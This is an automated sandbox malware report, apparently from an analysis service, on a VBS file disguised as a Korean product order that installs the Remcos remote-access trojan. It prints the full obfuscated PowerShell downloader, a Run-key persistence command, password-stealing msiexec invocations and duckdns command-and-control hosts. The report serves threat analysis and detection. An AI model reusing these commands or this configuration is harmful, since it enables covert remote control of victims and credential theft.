Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 05:01

General

  • Target

    globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs

  • Size

    34KB

  • MD5

    cb6936ce8eb2ba2d521916070ab46b7c

  • SHA1

    8aa7fe3dca2da0bbbfe85e4373668120b111576e

  • SHA256

    fd3bf69fade10848b46e3d7c17d3fbcfdf66e0a500debaaad3d8a0dd4249d105

  • SHA512

    60be01c49abe96142b94a48d244f771f42198ed845e81b6f79bafd0252942923637d00fa9fde50d08023fd1e4c717d3f7c527f32fdd88c835924a1e773db3d5a

  • SSDEEP

    384:f9xJH9ENwdC0tLm5AJpOwVfHzSHh2/Ry0JZEjDkGxWxS7wUl8TlR:f9xd9ENwdfNZpOWfuh2533EnDH7oTH

Malware Config

Extracted

Family

remcos

Botnet

Cla$$y

C2

fajkourt38haoustso1.duckdns.org:57484

fajkourt38haoustso1.duckdns.org:57483

iwarsut775laudryed1.duckdns.org:57484

iwarsut775laudryed2.duckdns.org:57484

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    kabnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    shibetgtst-B7S9LT

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Transportingly Isogrammes Inconversant Misfiles Sikkativerne #><#Haletudsens Yaoort Minnesota Diskstationens Kitchenwards temporalises #>$Aandrig='Ldreinstitutionerne';function Unpunctuality($windsock){If ($host.DebuggerEnabled) {$Brockish=5} for ($Tenorfljtes18=$Brockish;;$Tenorfljtes18+=6){if(!$windsock[$Tenorfljtes18]) { break }$isiacal+=$windsock[$Tenorfljtes18]}$isiacal}function Tangue($Falkespors){ .($Driverrutiner) ($Falkespors)}$Rosmarinlyngs=Unpunctuality ' Bolin EcthELambsTKomm .SektiW De tE sixtBEre,icCissylIllumIUdlanesprkkn InofT';$Eliminators=Unpunctuality 'DovenMGassioLanguzTangsiHjnelloveralIndu a Trev/';$Forstrkningsbjlke121=Unpunctuality 'MisgeTSeme lasg,rsA bar1Blks 2';$Knne='Menst[OmskrN spaneh.miot Nudi.P edesS.riveBelgnrPiialvJ rnhIHloftC Gyr EVaaseP ,dgrO Pl,siKar oNK oenTSurheMSkattASt eanko,roaAlonegSyndiESlvgaRloxod] nshe:Su.re: F llSHv,rnePlumpCInterUHandsR.vrddILaplnTSteamY OverPAntiqrMismoOForaaTLituao rundCbetafO Pla lRadio=Pr.cu$ ssisFUranoO asserSup rSEpi,aT ,estrunrevKSplurNP radIdemenn wee g DecySKo btbHectajLoamiLOl.efkLejevE ordr1Larid2 Keto1';$Eliminators+=Unpunctuality 'Sdeba5Ninn,.Preci0Vildn Denta(LatinWSymboiceratn,rugedHabitoRailhwTappesSk bs Tur.eN FremTKontr Az go1roset0Kokse. Medg0Suble;W,rbl NoncoW S priUnappn kon 6Coggl4Prodi;Skibs dampsxSibyl6data.4 Indb;Posre Fo,flrKons.vRhino:Skjor1 orpo3 Biog1Antim.Polyn0skaer)Detai Oven GCykeleMikroc EmigkRhetooCochi/Drosk2Sjatt0 Fibr1Image0 Iml,0Menne1K,rto0Ompos1 ofel CrazFOxycai CrearDig ie Tr kfPa enoPastixmodfo/ mike1Romer3Milos1 redn.Kerne0';$pixilated=Unpunctuality 'Doer.UHopsaSHu boESnea,RSm dr- ApriaWastig amareLyrebN Fr sT';$Forbeholdslse=Unpunctuality ' AderhContrtKollitStoppp ortvsRo,bi:Cajol/Panto/Lyo.ygArte aS,vlerSancyhForgeo Un,iucgmkadOl.agjS ikkoStormuHi rnrGennemPl,sg. eplucDay roFedtkmUn fa/ UnabP Paa aDatafrshafttStent1Orion.HistopCelesnTrafig,pape> Udmeh VindtMandetPeni pnicobs Bibr: Krep/Frgeg/SupergFarvaaVariar synthCo umoRenisuFjerld SiskjKvr,boDisesuLaan,rSussomMonodoTil,lnPent e imeo.DiplocHick oM.ninmLabbe/AstroP TyngaInve,r Fir,tFugti1Kol b. Mulsp Dec.nSkelsg';$Prizable=Unpunctuality 'Silkw>';$Driverrutiner=Unpunctuality 'Traf iStudeeMudslx';$Oplysningstids='Pathicism';$Connubially='\Calusa.Saw';Tangue (Unpunctuality 'Sm ds$ AdneG PaaflOverhOCachaBLithoACentrLA rik:Laangs Sys Y evogMVaa ePPatieHimparY,ekldSHit eoGlavedBeas ANonpucInsemt ForbYResurl ,olkIKnevrAAnn,e1Stude4 Morr3 Afpa=Beken$HenvieTengsNRacerVprede:Ver ia iellp ouarp FrakDShellA FormtDo,deaFetog+ Non.$Cussoccir.uoBemgtn Une.n .orsu DyppBAd.enI MoleaArcatlre.leLNeuroy');Tangue (Unpunctuality ' Syns$ClairGsmaaslI.entO subcB EfteAAlbinlFas i: GaddeSilikXMell.iMaskeT ,etjupan,iR ,oldE,urfm=Sprog$ tje fSurr,o PincRBromobAni oE torthRangeo,adpolHamliDtransS Ro kL hillsReubeeD,lop..nholS Ost pSensoLMaks IHustatmaks (Brand$CargoPGlaucRRepreIProgrZsynodALentibHayfoL B doeForba)');Tangue (Unpunctuality $Knne);$Forbeholdslse=$Exiture[0];$Grundversionens=(Unpunctuality 'Uopst$SprttgSammeL OpkrO HoejB BlasAExorclI ent:Fo.bopSm.glRgalvaEFalsks stegsHyphaD behaoOliekmEfter=ArthrnTinglETom,awBibac-FornuOAustrBSkamfJB skreJernbCLindlTLettu ananaSProphYA.draSL nehTUnd reSultaM Whin.Pre e$Mine.rMisveo saarS Ida.mA,teraS.mspRFasa iEpitonEtag.LUdsmuYB bulnFavorgGeo eS');Tangue ($Grundversionens);Tangue (Unpunctuality ' Hde $Trivip ndur PorteTids,s .ritsAnnotdMans oPoniamBunke.SamspHUd oveaktueaMicrodTnd neD smarEskims Wu t[Uddre$,llempChauvi ParkxCac giKapnil .enzaOpgavtImmureWaistdViltr]photo=Kalku$Hel.aESeriol avouiUndermIncooiTrvlen Symma amvrtproteo Autor Esp s');$Harcellerede=Unpunctuality 'Unhon$ ecipFagomrKuld eEmnedshabitsMise dTunenoCountmDagp .SprgtD SlinoNoninwPh,non Pe ulMi seoHisp,aCruc dSpagnFversii egnelWarl e inte(Huske$ProgeFTidsloEventr FipebB syaeBiskoh,ecimoSvartlamalgdUnerrs retulStabesBlodkeShiph, Nona$Fa,tlELordlc ForhtPla,fi orphrKor eiEphrasForen)';$Ectiris=$Symphysodactylia143;Tangue (Unpunctuality 'Devla$wari GMermilMendiO Slimb LaurAAccepL Uspo:plantOchlorOBserehGaffee TaledE eri=Tau.u(Extratsagkye Je,nsNiveltDjaev- ChorPConstACerattPanelHStail Co ha$Udadle ImpicEpoxyT.ysseiG,nbrrSa.daiTaphosFaktu)');while (!$Oohed) {Tangue (Unpunctuality 'Photo$SubnegWachelStrafoModembGnideaU derlUnp,r:SelvhPH,nniyPaasmrEnteroCoggegSkridePodern anjo=Acoma$ChapoSEma.jt Kr,mrRepr acollyfcentrvKodsjr.verpdEndociExpurg BygghUdstae Escod') ;Tangue $Harcellerede;Tangue (Unpunctuality ',ritusApp ltHud laBofl.RTuskitS.als-bowdls FemolAntilEM tonE hattPSwath proro4');Tangue (Unpunctuality 'Millt$ mailgDefinLen osoUnjesBpal rAUlidelIndec:gy naOStudioSceneH Imp ECoaledUphan= Smre( AmbitChamae eavesWebertVapo -forblPSta dAAntivTPresehUphol n hed$GuttiEFarveCLig sTPreguIS,mplrU somiVerbaSUhomo)') ;Tangue (Unpunctuality '.atte$SkewiG Moc LF rstOSurfcb aisAAfmilL Undt:FaxenhBrayiY lacopSpeljn nomooUnschPDecamHRock oleakfBPico,i HjlaAAshamsChrys=,iona$FrdiggonobrLBar,eOKal uB mulaDronklMinst:ForstBGonofEOvervDOrdreeA,trkvpollei L ysL TegmlMontieanstrDDrist1Solec5Ildsl5Dec t+ Valg+ fter%Vigne$Dip oe Fla xSar oI.heloTSolsiuUdbulRNonree Sly .Brit c SpilOSupe uS orhnForhoT') ;$Forbeholdslse=$Exiture[$Hypnophobias]}$Laverestaaende=317883;$Tegneprocedurerne=32929;Tangue (Unpunctuality 'Acrop$ fficgA ebil RuskO DiskbHjernANonmeLStork:RetlifKloriIProcrLSg ngTRi oueQuestr ContEArbalTDetal Tr,en=Under Op,thgNyorieSvolvTForma-B,tnkC SatiOFenn,NServiTHostieBenbuNbagerT Ptil tele$ReinfELapsucFusiotKom ui ZoisRNgenhI.iskaS');Tangue (Unpunctuality ' Romb$ C,ntgBld rlDelraoSiksabsaltuaPaje l omle:,athisFetispVrigoi TilskAutheeTostahGummioHovedlMaliceResee ancho=Excis Anted[ P odS ompyUncols oliet Tu feskruemRepl . ikeC FortoMesornGibbyvT lleeChefrr Incrt Croi] Tilh: R.ag:ByggeFHorserMoniloberoemLa ouBBuk ea awksDerieeHuorn6 atal4Myx sSFisketWhatar B aci Fljtn esiggTautl(Trskr$ apitFMayfii LodglSkudltAn iheAcetar Butte AchitUd.mm)');Tangue (Unpunctuality 'Trett$HomosgThe gL B,deOMolarB Sv pAForstL,chap:Fireop gmeleduelltBeskarBlijvoKej,eLGr duEUnr suCuiramDr.ppmStykgeHypotN Ca is uto2Pern 5Firma3T.aie aflgg=bog i Ka ie[SvigesDe.feyOmopls Mndtt H lde .amfmHe.ti.SkeptT SbeoEIndtgxAdmirTBaand.Hemate LignNLetfoc,reenoS rdiDBrigaiLystsn SammGFulcr] Blom:H.per:nor.eA H.veSUniv,cSuperISvelniLasty. M,thG pproeTransTRungesRe.ertEndurr.emrei budgNUreglgUnqua( Stan$Ens bSseligpIn ucibil ek GentE NonihBi orONondelO.strEM xni)');Tangue (Unpunctuality 'Tu ul$ WhinGNed klHae oophallbB egna olicl Oply: S.ksaLimp RSwingbSta,nE P.tlj StikDKonstSPrepuTPseudI,oopsl UndelLikenAForkeD Tryke esthlC alcSFrs,ee nco=Foru $ CasapUndiseMislyTUppluRHks ko Pa,alTilbreFrowsUTo rcMPlastmMysteeDi.ignTkkenSVapo 2rette5Rigdo3Overs.ZoiatSHk enu xorBOveresAktratRebesRMuseriGeochN laongUnpub(Gothi$ emedlIndu,aGladsVInconEOmadrR Anale .isiSMisprTBikaraThixoA AllueTangeNNedfadO,tfaE Hete,Knbe $Pre,eTD yadE Signg,nderN PhotEGldspP AltdRNoncoosteriCDifflEtissedPreadU Monor TmmeE GrutrVegetnN nene Goba)');Tangue $Arbejdstilladelse;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:820
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Transportingly Isogrammes Inconversant Misfiles Sikkativerne #><#Haletudsens Yaoort Minnesota Diskstationens Kitchenwards temporalises #>$Aandrig='Ldreinstitutionerne';function Unpunctuality($windsock){If ($host.DebuggerEnabled) {$Brockish=5} for ($Tenorfljtes18=$Brockish;;$Tenorfljtes18+=6){if(!$windsock[$Tenorfljtes18]) { break }$isiacal+=$windsock[$Tenorfljtes18]}$isiacal}function Tangue($Falkespors){ .($Driverrutiner) ($Falkespors)}$Rosmarinlyngs=Unpunctuality ' Bolin EcthELambsTKomm .SektiW De tE sixtBEre,icCissylIllumIUdlanesprkkn InofT';$Eliminators=Unpunctuality 'DovenMGassioLanguzTangsiHjnelloveralIndu a Trev/';$Forstrkningsbjlke121=Unpunctuality 'MisgeTSeme lasg,rsA bar1Blks 2';$Knne='Menst[OmskrN spaneh.miot Nudi.P edesS.riveBelgnrPiialvJ rnhIHloftC Gyr EVaaseP ,dgrO Pl,siKar oNK oenTSurheMSkattASt eanko,roaAlonegSyndiESlvgaRloxod] nshe:Su.re: F llSHv,rnePlumpCInterUHandsR.vrddILaplnTSteamY OverPAntiqrMismoOForaaTLituao rundCbetafO Pla lRadio=Pr.cu$ ssisFUranoO asserSup rSEpi,aT ,estrunrevKSplurNP radIdemenn wee g DecySKo btbHectajLoamiLOl.efkLejevE ordr1Larid2 Keto1';$Eliminators+=Unpunctuality 'Sdeba5Ninn,.Preci0Vildn Denta(LatinWSymboiceratn,rugedHabitoRailhwTappesSk bs Tur.eN FremTKontr Az go1roset0Kokse. Medg0Suble;W,rbl NoncoW S priUnappn kon 6Coggl4Prodi;Skibs dampsxSibyl6data.4 Indb;Posre Fo,flrKons.vRhino:Skjor1 orpo3 Biog1Antim.Polyn0skaer)Detai Oven GCykeleMikroc EmigkRhetooCochi/Drosk2Sjatt0 Fibr1Image0 Iml,0Menne1K,rto0Ompos1 ofel CrazFOxycai CrearDig ie Tr kfPa enoPastixmodfo/ mike1Romer3Milos1 redn.Kerne0';$pixilated=Unpunctuality 'Doer.UHopsaSHu boESnea,RSm dr- ApriaWastig amareLyrebN Fr sT';$Forbeholdslse=Unpunctuality ' AderhContrtKollitStoppp ortvsRo,bi:Cajol/Panto/Lyo.ygArte aS,vlerSancyhForgeo Un,iucgmkadOl.agjS ikkoStormuHi rnrGennemPl,sg. eplucDay roFedtkmUn fa/ UnabP Paa aDatafrshafttStent1Orion.HistopCelesnTrafig,pape> Udmeh VindtMandetPeni pnicobs Bibr: Krep/Frgeg/SupergFarvaaVariar synthCo umoRenisuFjerld SiskjKvr,boDisesuLaan,rSussomMonodoTil,lnPent e imeo.DiplocHick oM.ninmLabbe/AstroP TyngaInve,r Fir,tFugti1Kol b. Mulsp Dec.nSkelsg';$Prizable=Unpunctuality 'Silkw>';$Driverrutiner=Unpunctuality 'Traf iStudeeMudslx';$Oplysningstids='Pathicism';$Connubially='\Calusa.Saw';Tangue (Unpunctuality 'Sm ds$ AdneG PaaflOverhOCachaBLithoACentrLA rik:Laangs Sys Y evogMVaa ePPatieHimparY,ekldSHit eoGlavedBeas ANonpucInsemt ForbYResurl ,olkIKnevrAAnn,e1Stude4 Morr3 Afpa=Beken$HenvieTengsNRacerVprede:Ver ia iellp ouarp FrakDShellA FormtDo,deaFetog+ Non.$Cussoccir.uoBemgtn Une.n .orsu DyppBAd.enI MoleaArcatlre.leLNeuroy');Tangue (Unpunctuality ' Syns$ClairGsmaaslI.entO subcB EfteAAlbinlFas i: GaddeSilikXMell.iMaskeT ,etjupan,iR ,oldE,urfm=Sprog$ tje fSurr,o PincRBromobAni oE torthRangeo,adpolHamliDtransS Ro kL hillsReubeeD,lop..nholS Ost pSensoLMaks IHustatmaks (Brand$CargoPGlaucRRepreIProgrZsynodALentibHayfoL B doeForba)');Tangue (Unpunctuality $Knne);$Forbeholdslse=$Exiture[0];$Grundversionens=(Unpunctuality 'Uopst$SprttgSammeL OpkrO HoejB BlasAExorclI ent:Fo.bopSm.glRgalvaEFalsks stegsHyphaD behaoOliekmEfter=ArthrnTinglETom,awBibac-FornuOAustrBSkamfJB skreJernbCLindlTLettu ananaSProphYA.draSL nehTUnd reSultaM Whin.Pre e$Mine.rMisveo saarS Ida.mA,teraS.mspRFasa iEpitonEtag.LUdsmuYB bulnFavorgGeo eS');Tangue ($Grundversionens);Tangue (Unpunctuality ' Hde $Trivip ndur PorteTids,s .ritsAnnotdMans oPoniamBunke.SamspHUd oveaktueaMicrodTnd neD smarEskims Wu t[Uddre$,llempChauvi ParkxCac giKapnil .enzaOpgavtImmureWaistdViltr]photo=Kalku$Hel.aESeriol avouiUndermIncooiTrvlen Symma amvrtproteo Autor Esp s');$Harcellerede=Unpunctuality 'Unhon$ ecipFagomrKuld eEmnedshabitsMise dTunenoCountmDagp .SprgtD SlinoNoninwPh,non Pe ulMi seoHisp,aCruc dSpagnFversii egnelWarl e inte(Huske$ProgeFTidsloEventr FipebB syaeBiskoh,ecimoSvartlamalgdUnerrs retulStabesBlodkeShiph, Nona$Fa,tlELordlc ForhtPla,fi orphrKor eiEphrasForen)';$Ectiris=$Symphysodactylia143;Tangue (Unpunctuality 'Devla$wari GMermilMendiO Slimb LaurAAccepL Uspo:plantOchlorOBserehGaffee TaledE eri=Tau.u(Extratsagkye Je,nsNiveltDjaev- ChorPConstACerattPanelHStail Co ha$Udadle ImpicEpoxyT.ysseiG,nbrrSa.daiTaphosFaktu)');while (!$Oohed) {Tangue (Unpunctuality 'Photo$SubnegWachelStrafoModembGnideaU derlUnp,r:SelvhPH,nniyPaasmrEnteroCoggegSkridePodern anjo=Acoma$ChapoSEma.jt Kr,mrRepr acollyfcentrvKodsjr.verpdEndociExpurg BygghUdstae Escod') ;Tangue $Harcellerede;Tangue (Unpunctuality ',ritusApp ltHud laBofl.RTuskitS.als-bowdls FemolAntilEM tonE hattPSwath proro4');Tangue (Unpunctuality 'Millt$ mailgDefinLen osoUnjesBpal rAUlidelIndec:gy naOStudioSceneH Imp ECoaledUphan= Smre( AmbitChamae eavesWebertVapo -forblPSta dAAntivTPresehUphol n hed$GuttiEFarveCLig sTPreguIS,mplrU somiVerbaSUhomo)') ;Tangue (Unpunctuality '.atte$SkewiG Moc LF rstOSurfcb aisAAfmilL Undt:FaxenhBrayiY lacopSpeljn nomooUnschPDecamHRock oleakfBPico,i HjlaAAshamsChrys=,iona$FrdiggonobrLBar,eOKal uB mulaDronklMinst:ForstBGonofEOvervDOrdreeA,trkvpollei L ysL TegmlMontieanstrDDrist1Solec5Ildsl5Dec t+ Valg+ fter%Vigne$Dip oe Fla xSar oI.heloTSolsiuUdbulRNonree Sly .Brit c SpilOSupe uS orhnForhoT') ;$Forbeholdslse=$Exiture[$Hypnophobias]}$Laverestaaende=317883;$Tegneprocedurerne=32929;Tangue (Unpunctuality 'Acrop$ fficgA ebil RuskO DiskbHjernANonmeLStork:RetlifKloriIProcrLSg ngTRi oueQuestr ContEArbalTDetal Tr,en=Under Op,thgNyorieSvolvTForma-B,tnkC SatiOFenn,NServiTHostieBenbuNbagerT Ptil tele$ReinfELapsucFusiotKom ui ZoisRNgenhI.iskaS');Tangue (Unpunctuality ' Romb$ C,ntgBld rlDelraoSiksabsaltuaPaje l omle:,athisFetispVrigoi TilskAutheeTostahGummioHovedlMaliceResee ancho=Excis Anted[ P odS ompyUncols oliet Tu feskruemRepl . ikeC FortoMesornGibbyvT lleeChefrr Incrt Croi] Tilh: R.ag:ByggeFHorserMoniloberoemLa ouBBuk ea awksDerieeHuorn6 atal4Myx sSFisketWhatar B aci Fljtn esiggTautl(Trskr$ apitFMayfii LodglSkudltAn iheAcetar Butte AchitUd.mm)');Tangue (Unpunctuality 'Trett$HomosgThe gL B,deOMolarB Sv pAForstL,chap:Fireop gmeleduelltBeskarBlijvoKej,eLGr duEUnr suCuiramDr.ppmStykgeHypotN Ca is uto2Pern 5Firma3T.aie aflgg=bog i Ka ie[SvigesDe.feyOmopls Mndtt H lde .amfmHe.ti.SkeptT SbeoEIndtgxAdmirTBaand.Hemate LignNLetfoc,reenoS rdiDBrigaiLystsn SammGFulcr] Blom:H.per:nor.eA H.veSUniv,cSuperISvelniLasty. M,thG pproeTransTRungesRe.ertEndurr.emrei budgNUreglgUnqua( Stan$Ens bSseligpIn ucibil ek GentE NonihBi orONondelO.strEM xni)');Tangue (Unpunctuality 'Tu ul$ WhinGNed klHae oophallbB egna olicl Oply: S.ksaLimp RSwingbSta,nE P.tlj StikDKonstSPrepuTPseudI,oopsl UndelLikenAForkeD Tryke esthlC alcSFrs,ee nco=Foru $ CasapUndiseMislyTUppluRHks ko Pa,alTilbreFrowsUTo rcMPlastmMysteeDi.ignTkkenSVapo 2rette5Rigdo3Overs.ZoiatSHk enu xorBOveresAktratRebesRMuseriGeochN laongUnpub(Gothi$ emedlIndu,aGladsVInconEOmadrR Anale .isiSMisprTBikaraThixoA AllueTangeNNedfadO,tfaE Hete,Knbe $Pre,eTD yadE Signg,nderN PhotEGldspP AltdRNoncoosteriCDifflEtissedPreadU Monor TmmeE GrutrVegetnN nene Goba)');Tangue $Arbejdstilladelse;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5076
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1884
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Mitvoth" /t REG_EXPAND_SZ /d "%Odalman% -windowstyle 1 $Voodooistic=(gp -Path 'HKCU:\Software\Rich\').Caracas;%Odalman% ($Voodooistic)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3236
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Mitvoth" /t REG_EXPAND_SZ /d "%Odalman% -windowstyle 1 $Voodooistic=(gp -Path 'HKCU:\Software\Rich\').Caracas;%Odalman% ($Voodooistic)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:456
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pyphsfixsdywghdykgkurffe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:400
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\zavasxtyglqaqnzkurxvurancccv"
        3⤵
          PID:1020
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\zavasxtyglqaqnzkurxvurancccv"
          3⤵
          • Accesses Microsoft Outlook accounts
          • System Location Discovery: System Language Discovery
          PID:4816
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\cuiklqdsutintbnolbsxfwuekjuemlr"
          3⤵
            PID:3312
          • C:\Windows\SysWOW64\msiexec.exe
            C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\cuiklqdsutintbnolbsxfwuekjuemlr"
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3176

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        d4ff23c124ae23955d34ae2a7306099a

        SHA1

        b814e3331a09a27acfcd114d0c8fcb07957940a3

        SHA256

        1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

        SHA512

        f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bddw5d4k.eem.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\pyphsfixsdywghdykgkurffe

        Filesize

        4KB

        MD5

        c3c5f2de99b7486f697634681e21bab0

        SHA1

        00f90d495c0b2b63fde6532e033fdd2ade25633d

        SHA256

        76296dc29f718988107d35d0e0b835c2bf3fc7405e79e5121aa4738f82b51582

        SHA512

        7c60ffdc093de30e793d20768877f2f586bee3e948767871f9a1139252d5d2f593ba6f88ce0ed5f72c79faddb26186792df0581e4b6c84d405c44d9d12f951b8

      • C:\Users\Admin\AppData\Roaming\Calusa.Saw

        Filesize

        456KB

        MD5

        c6343dd856d5bfdbf953bf705045ad58

        SHA1

        d01e82e1069b9151c914ab1e0323a1b39f705aa9

        SHA256

        1cc0540ee451605d0ea7d5f5bb1d1d9869cacc45e10a4fdfdc77511dffc36dd0

        SHA512

        481c699bf9bf17297691edf1ca60ac6b54d3166e34c82d9f656b4b1abd9c03766a9270c556385fc8d7700c834549443b546e1abc5d3e716d222c1edd42686120

      • memory/400-58-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/400-65-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/400-60-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/400-55-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/820-11-0x00007FF97C100000-0x00007FF97CBC1000-memory.dmp

        Filesize

        10.8MB

      • memory/820-0-0x00007FF97C103000-0x00007FF97C105000-memory.dmp

        Filesize

        8KB

      • memory/820-1-0x000001B2F99E0000-0x000001B2F9A02000-memory.dmp

        Filesize

        136KB

      • memory/820-12-0x00007FF97C100000-0x00007FF97CBC1000-memory.dmp

        Filesize

        10.8MB

      • memory/820-18-0x00007FF97C100000-0x00007FF97CBC1000-memory.dmp

        Filesize

        10.8MB

      • memory/820-15-0x00007FF97C100000-0x00007FF97CBC1000-memory.dmp

        Filesize

        10.8MB

      • memory/1884-75-0x0000000021680000-0x0000000021699000-memory.dmp

        Filesize

        100KB

      • memory/1884-71-0x0000000021680000-0x0000000021699000-memory.dmp

        Filesize

        100KB

      • memory/1884-74-0x0000000021680000-0x0000000021699000-memory.dmp

        Filesize

        100KB

      • memory/1884-50-0x0000000001270000-0x00000000024C4000-memory.dmp

        Filesize

        18.3MB

      • memory/3176-63-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/3176-64-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/3176-57-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/4816-62-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/4816-61-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/4816-56-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/5076-21-0x00000000057B0000-0x00000000057D2000-memory.dmp

        Filesize

        136KB

      • memory/5076-43-0x0000000008A50000-0x000000000B124000-memory.dmp

        Filesize

        38.8MB

      • memory/5076-41-0x00000000084A0000-0x0000000008A44000-memory.dmp

        Filesize

        5.6MB

      • memory/5076-40-0x0000000007260000-0x0000000007282000-memory.dmp

        Filesize

        136KB

      • memory/5076-39-0x0000000007300000-0x0000000007396000-memory.dmp

        Filesize

        600KB

      • memory/5076-38-0x0000000006600000-0x000000000661A000-memory.dmp

        Filesize

        104KB

